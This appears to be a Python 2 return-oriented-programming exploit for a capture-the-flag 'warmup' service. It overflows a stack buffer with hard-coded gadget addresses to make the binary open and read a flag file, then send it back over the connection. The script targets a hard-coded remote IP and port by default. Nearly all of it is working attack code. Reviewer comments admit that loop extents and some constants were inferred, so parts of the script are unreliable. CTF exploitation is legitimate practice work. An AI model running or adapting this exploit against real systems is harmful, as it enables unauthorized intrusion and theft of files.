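"""ROP exploit for the CTF "warmup" pwn service (Python 2).

Each request overflows a stack buffer: PAD bytes of filler, a return
address inside the (non-PIE) target binary, then up to four u32 words
that become the post-call return address and the call's arguments.
The sequence below (reconstructed from the original flat script):

  1. read(0, buf, len(flag_p))  -> then send the flag path into `buf`
  2. a chain the original author annotated "dis is open" (x10)
  3. read(0, buf, 5) returning to `clean` -> send the first 5 path bytes
  4. a chain with dummy args 1,2,3,4 (x10)
  5. read(3, buf, 128) -- fd 3 is presumably the descriptor opened in 2
  6. the dummy chain again (x1)
  7. write(0, buf, 128) -- dump the buffer back over the connection
  8. drain whatever the service still sends

The binary addresses are hard-coded for one specific target build.
Only run this against infrastructure you are authorized to attack.

NOTE(review): the source this was rebuilt from had lost all indentation,
so the extent of the two `for` loop bodies is inferred (send + one read
inside, one extra read after) -- verify against the original if output
timing looks off.
"""
from codez import *   # provides Remote(host, port) and pack(); pack() appears to be struct.pack (see commented import)
import socket
import sys
import time
#from struct import *

# --- target -----------------------------------------------------------------
# Override on the command line: python exploit.py HOST PORT
DEFAULT_HOST = '202.120.7.207'
DEFAULT_PORT = 52608
#DEFAULT_HOST, DEFAULT_PORT = 'localhost', 1234

# --- payload data -------------------------------------------------------------
# Flag path, NUL-terminated and zero-padded to a fixed 119 bytes so the
# read() in step 1 gets exactly the byte count we ask for.
flag_p = '/home/warmup/flag\x00'.ljust(119, '\x00')
#flag_p = '/tmp//warmup/flag\x00'.ljust(119,'\x00')

buf = 0x08049000          # writable scratch area inside the binary's image

# Addresses in the target binary (fixed, non-PIE).
read = 0x804811D          # chain entry used with (ret, fd, buf, n) -> read(fd, buf, n)
write = 0x8048135         # chain entry used with (ret, fd, buf, n) -> write(fd, buf, n)
clean = 0x80481B8         # post-call return address used in step 3
RET_80480D8 = 0x80480d8   # NOTE(review): used both as a post-call return and as a chain entry; looks like a stack-adjusting gadget -- confirm in the binary
RET_804815D = 0x804815d   # post-call return address used in step 1
ADDR_804813A = 0x804813a  # second word of the "dis is open" chain; meaning not recoverable here

PAD = 0x34 - 20           # filler before the saved return address (TODO(review): confirm why 20 is subtracted from 0x34)
FRAME = 0x34              # total size step 3's payload is padded to


def chain(ret, *words):
    """Build one overflow payload.

    PAD filler bytes, then `ret`, then `words` packed as native u32s
    (little-endian on the x86 target). Equivalent to the original
    pack('I', ret) + pack('IIII', ...) construction for four words.
    """
    return 'A' * PAD + pack('I', ret) + pack('I' * len(words), *words)


def drain(sock, rounds=10, timeout=5.0):
    """Print up to `rounds` chunks the service still sends, as repr().

    Stops early on EOF or if nothing arrives within `timeout` seconds;
    the original loop blocked forever once the service went quiet.
    """
    sock.settimeout(timeout)
    for _ in range(rounds):
        try:
            data = sock.recv(1024)
        except socket.timeout:
            break
        if not data:
            break
        print(repr(data))


def main(argv):
    """Run the full exploit sequence against HOST PORT (defaults above)."""
    host = argv[1] if len(argv) > 1 else DEFAULT_HOST
    port = int(argv[2]) if len(argv) > 2 else DEFAULT_PORT
    r = Remote(host, port)

    print(r.read('!'))                                   # banner up to the first prompt

    # 1. read(0, buf, len(flag_p)) returning to RET_804815D, then feed the path.
    r.write(chain(read, RET_804815D, 0, buf, len(flag_p)))
    print(r.read('!'))
    r.write(flag_p)

    # 2. Original author's note on this chain: "dis is open".
    p0 = chain(RET_80480D8, 0, ADDR_804813A, RET_80480D8, buf)
    for _ in range(10):
        r.write(p0)
        print(r.read('!'))
    print(r.read('!'))

    print('spammed')
    raw_input('x')                                       # manual checkpoint (Python 2 builtin)

    # 3. read(0, buf, 5) returning to `clean`; payload padded to FRAME with 'B'.
    p1 = chain(read, clean, 0, buf, 5).ljust(FRAME, 'B')
    r.write(p1)
    print(r.read('!'))
    r.write(flag_p[:5])
    r.read('!')

    # 4. Chain with placeholder words 1..4 -- only the entry address matters here.
    p0 = chain(RET_80480D8, 1, 2, 3, 4)
    for _ in range(10):
        r.write(p0)
        print(r.read('!'))
    print(r.read('!'))

    # 5. read(3, buf, 128): fd 3 is presumably what step 2 opened -- verify.
    r.write(chain(read, RET_80480D8, 3, buf, 128))
    print(r.read('!'))
    print(r.read('!'))
    print('fap')

    # 6. Same placeholder chain, once.
    r.write(chain(RET_80480D8, 1, 2, 3, 4))
    print(r.read('!'))
    print(r.read('!'))

    # 7. write(0, buf, 128) -- fd 0 is the connection if the service is socket-fed.
    print(r.write(chain(write, 0, 0, buf, 128)))
    r.read('!')

    # 8. Collect the dumped buffer (and anything else) from the raw socket.
    drain(r.sock)


if __name__ == '__main__':
    main(sys.argv)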